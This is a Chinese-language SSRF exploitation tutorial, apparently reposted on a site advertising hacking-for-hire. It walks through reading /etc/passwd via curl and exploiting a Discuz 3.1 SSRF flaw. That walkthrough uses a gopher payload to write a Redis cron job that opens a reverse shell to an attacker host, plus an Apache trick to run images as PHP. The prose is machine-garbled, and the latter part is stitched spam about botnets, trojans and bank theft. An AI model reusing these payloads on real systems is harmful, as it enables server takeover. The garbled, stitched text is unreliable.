作者:WHITE
文章来历:Ms08067安全试验室
什么是SSRF?
SSRF(Server-Side Request Forgery,服务器端央求假造)是一种由侵犯者结构央求,运用服务器端主张的安全缝隙。一般情况下,SSRF侵犯的方针是外网无法拜访的内部系统(正由于央求是由服务器端主张的,所以服务器能央求到与本身相连而外网阻隔的内部系统)。
Example:
GET /index.php?url=http://google.com/ HTTP/1.1
Host: example.com
在这儿,http://example.com从它的服务器获取http://google.com
目录
0X00 SSRF的类型
0X01 什么当地最简略呈现SSRF
0X02 SSRF缝隙的损害
0X03 SSRF神器Curl的运用
0X04 最常用的跳转绕过
0X05 Python+SSRF完结端口扫描
0X06 运用Discuz的SSRF缝隙GetShell
0X07 简略的绕过SSRF图片的约束
0X08 或许遇到的问题
0X09 常用发掘SSRF缝隙的东西
0X00 SSRF的类型
1. 显现侵犯者的呼应(Basic)
2. 不显现呼应(Blind)
0X01 什么当地最简略呈现SSRF
云服务器商。(各种网站数据库操作)
有远程图片加载的当地。(编辑器之类的有远程图片加载啊)
网站收集、网页抓取的当地。(许多网站会有新闻收集输入url然后一键收集)
头像的当地。(某易就喜爱远程加载头像,例如:https://www.xxxx.com/image?url=https://www.hack56.com/images/rtau1jeroci.jpg)
终究一个全部要你输入网址的当地和可以输入ip的都放,都是ssrf的全国。
0X02 SSRF缝隙的损害
对服务器地点的内网进行端口扫描,获取一些服务的banner信息等
侵犯工作在内网或许本地的运用程序
对内网WEB运用进行指纹识别,通过拜访默许文件完结(Readme等文件)
侵犯内外网的WEB运用,首要是GET就可以完结的侵犯(比方Struts2,SQL注入等)
下载内网资源(运用file协议读取本地文件等)
运用Redis未授权拜访,HTTP CRLF注入到达getshell
wooyun峰会猪猪侠的ppt
进行跳板
无视cdn
0X03 SSRF神器Curl的运用
检查curl支撑的协议列表 #curl--config –protocols
运用curl读取文件
curl -v file:///etc/passwd
运用ftp协议
curl -v "ftp://127.0.0.1:6666/info"
运用dict协议
curl -v "dict://127.0.0.1:6666/info"
运用gopher协议
curl -v "gopher://127.0.0.1:6666/_info"
0X04最常用的跳转绕过
0X05 Python+SSRF完结端口扫描
简略的端口扫描
一同调查Wireshark整个扫描流程
代码完结:
验证本地是否敞开了相应的端口
Python代码编写的思路:
端口存在衔接会一直在衔接,衔接时间会很长。
端口不存在的衔接会被立马改写
0X06 运用Discuz的SSRF缝隙GetShell
Discuz无条件约束ssrf缝隙(<=3.1测验是有这个缝隙)
试验环境:
172.28.100.109 为Discuz 3.1(Win10),172.28.100.108为Redis服务器(CentOS),hacker.xxxx.com为公网$ ls /usr/src/linux-source-4.15.0.tar.bz2测验服务器首要寄存ssrf用的php文件
Discuz3.1下载地址:
http://www.comsenz.com/downloads/install/discuzx#down_open
示例:
/forum.php?mod=ajax&action=downremoteimg&message=[img]https://www.hack56.com/images/ctf1ogvfg3k.jpg[/img]
实际运用payload:
http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]https://www.hack56.com/images/ *** 4ousago2q.jpg[/img]
运用nc来测验SSRF缝隙
http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://172.28.100.108:6666/?data=root.jpg[/img]
tcpdump抓包看到Discuz发来的数据包
nc也有反响了
根本可以供认这儿是有SSRF缝隙
运用header 来合作ssrf缝隙运用,在我公网服务器放了一个ssrf.php
<?php
header("Location: ftp://172.28.100.108:6666/info");
?>
这儿我是通过传参的 *** ,便利测验时分修正参数,代码如下:
PAYLOAD:
http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]https://www.hack56.com/images/ *** 4ousago2q.jpg[/img]
相同nc也承受到了数据,测验时分发现ftp协议比http要快一些
KALI机器翻开socat端口转发(-v参数可以将转发进程的日志记载打印出来)
socat -v tcp-listen:6666,fork tcp-connect:172.28.100.108:6379
衔接SSRF脚本
#留意centos和ubuntu系统的计划任务有些不一样,centos默许在/var/spool/cron/root,ubuntu默许是在/etc/crontab
履行成功
#第四步能履行成功的条件有必要方针目录有写权限
到redis服务器的上检查/var/spool/cron目录下现已创建了root文件内容为*/1 * * * * bash -i >&/dev/tcp/hacker.xxxx.com/9999 0>&1
将socat的输出信息保存为1.txt,上传到公网服务器上
运用Python脚本转换为gopher支撑的格式
留意终究要检查一下格式是否无缺:*/1 * * * * bash -i >& /dev/tcp/hacker.xxx.com/99990>&1
新建gohper.php文件放到我自己的云服务器的网站根目录上,当Discuz拜访gohper.php文件时分就会跳转302跳转运用gohper协议拜访内部redis服务器
标准格式示例:
<?php
header("Location:gopher://172.28.100.108:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$62%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/hacker.xxxx.com/9999 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a%0a");
?>
方针机器SSRF缝隙的运用
进程中运用Wireshark抓包调查进程
方针redis服务器上发现计划任务现已收效了,假如这儿有乱码,请翻倒文章底部有处理方案
方针Redis的shell现已发给我的服务器了
0X07 简略的绕过SSRF图片的约束
Apache装备/etc/apache2/sites-enabled/,新建一个apache的装备文件123.conf
AddHandler application/x-httpd-php .php
这样apache就会把jpg也当作php解析;假如我们遇到约束了jpg后缀的ssrf缝隙就可以运用该 *** ,同理假如约束了txt的话。我们在apache设置把txt当作php解析即可。
将文件名命名为1.php.jpg即可拜访
也可以这样写AddHandler application/x-httpd-php .jpg
0X08 或许遇到的问题
以下问题是由于我用的linux上vim编辑器导致的,后运用Sublime编辑器处理了乱码问题
0X09 常用发掘SSRF缝隙的东西
运用F12,检查网站的 *** 央求
运用GoogleHacking,如site:www.baidu.com,然后查找网站是否有关于url的远程调用
黑客高手接单:SSRF缝隙使用 Getshell实战
通过cc服务器结束的一系列 *** ,选中的函数的功用是获取windows的powershell:def dump_cred *** an_generic():SSRF漏洞利用 Getshell实战
黑客高手接单“工欲善其事,必先利其器”,在正式初步,先来讲讲固件分析环境的建立,首要就是binwalk的设备。由于固件紧缩打包的 *** 有许多种,单用apt instll binwalk这条指令设备,许多文件系统的格式是不支撑解压的,需求将各种解压插件一同设备,才华正确解压出固件中的文件系统。无缺设备可参看binwalk的官方设备文档。但每次都要这样手动设备,笔者觉得很费事,因此写了设备脚本自动结束设备。 一、布景BillGates恶意软件针对工作中的linux服务器,其首要目的是感染服务器,将它们衔接在一个通过中心 C & C服务器控制的僵尸 *** 中,指示机器人在方针上主张 DDoS 侵犯。根据 Akamai 的安全情报研究小组 (SIRT),现在黑客的装备已从比较旧的XOR DDoS 僵尸 *** 装备现已切换到 BillGates 僵尸网路。
Nmap done: 1 IP address (1 host up) scanned in 33.81 seconds然后运用网易有道云笔记的文件同享功用来进一步下载木马,可以看到该地址上寄存了许多的木马。1. LPD信息收集黑客高手接单
丰盛的编程阅历 但是这儿的 Lua 默许是工作在 Sandbox 里,许多标准的 Lua modules 和 functions 都被阻止了绕过证书确认其间,回调函数Url_parser只处理两种央求,分别为:
@rootkey = N'HKEY_LOCAL_MACHINE', 其他用户:未曾掌控资源的其他用户;other, o 与其他仿照器比较,Metasploit Vulnerable ServicesEmulator轻量细巧显然是其特征之一。Metasploit 2压缩包需求873M,要建立Metasploitable3需求65G的磁盘空间和4.5G的RAM,而Metasploit Vulnerable Services Emulator压缩包只需16K,由于无需虚拟机,这款仿照器对内存也没有具体要求。
[1][2]黑客接单网
4. Avr libc是一个开源项目,针对atmel厂商的各种微控制器开发C言语库、编译器、烧录东西等一系列辅佐东西,还有针对Windows途径的WinAvr项目。Arduino ide的中心其实也是avr libc。SSRF漏洞利用 Getshell实战黑客高手接单影响和风险运用电磁波作为隐蔽信道传输数据或许是最早被研讨的 *** 。Kuhn和Anderson在其前期作业中研讨了运用显卡宣告的电磁波来泄露数据的 *** 。G *** em,Funthenna和Savat技术介绍了侵犯者可以运用电脑主板宣告的各种电磁辐射作为泄露数据的隐蔽信道。Loughry和Umphress研讨了运用键盘LED等宣告的光来结束数据盗取。Shaamir等人演示了怎样运用远程激光和扫描仪建立隐蔽信道的 *** 。BitWhisper技术更是通过热量来完结信息的传输。所以,今天我要介绍给你一些更好的暗码处理器,它们可在 Windows、Mac、Linux、Android、iOS 和企业中运用。2. 现在互联网上的信息很多,这些对错名单是否值得信任?
初探内网的环境是这样的
为了VPS的安全,总结一下几个要害的进程:
echo "文件名:".$_FILES['upfile']['name']."";黑客高手接单回车供认等候一小会就ok了。终究,我们从头再翻开服务器即可工作。部分功用如下图drwxr-xr-x 2 root root 4096 Sep 9 03:13 20140909$ vi ~/.mutt/passwordSSRF漏洞利用 Getshell实战
require 'base64'V. CVE-2015-5122再起波澜
本文导读目录: 1、别人知道我的,姓名银行卡号,身份证号以及手机号,可以盗取我银行卡里,面的钱吗? 2、黑客窃取银行密码后,会怎么把我的钱转走? 3、假如黑客知道了我银行卡账号和姓名,他能把卡...
你好,有下列几类方法能够自定上传照片: 1. 自定上传照片上传到口 ① 在新创建模块时“加上艺术创意”控制模块中,点一下改动连接,开启以下网页页面。可根据从素材网提交和当地提交二种方法...
背景:2014年9月4日,魅族科技今日与戴尔签署合作备忘录,双方将建立长期战略合作伙伴关系,致力于加速魅族移动互联网基础建设,同时协助魅族搭建内部私有云。这一举动,也体现了戴尔对中国高端手机制造业的支...
本文导读目录: 1、黑客帝国4深度解析 2、黑客帝国结尾造物主和先知的对话是什么意思? 3、黑客帝国最后什么意思,虽然终结了,但是还是留下了许多问题。尼奥被机器带去哪了?他回家了?还是死了?...
黑客如何远程黑入微信怎样把别人的手机植入病毒(手机植入病毒)怎么解决黑客入侵qqexplorer怎么使用(qqexplorer使用教程)怎么解除黑客的控制快手如何人肉(如何人肉搜)怎么知道电脑被黑客入...
1.PUBLIC:病毒在本地生成的RSA密钥对中的公钥部分SQL服务器授权Cookie盗取我信任绝大多数人第一眼看到都觉得这应该是一个满足安全的暗码,即使再让你多看几眼……究竟这个暗码看起来既没有规则...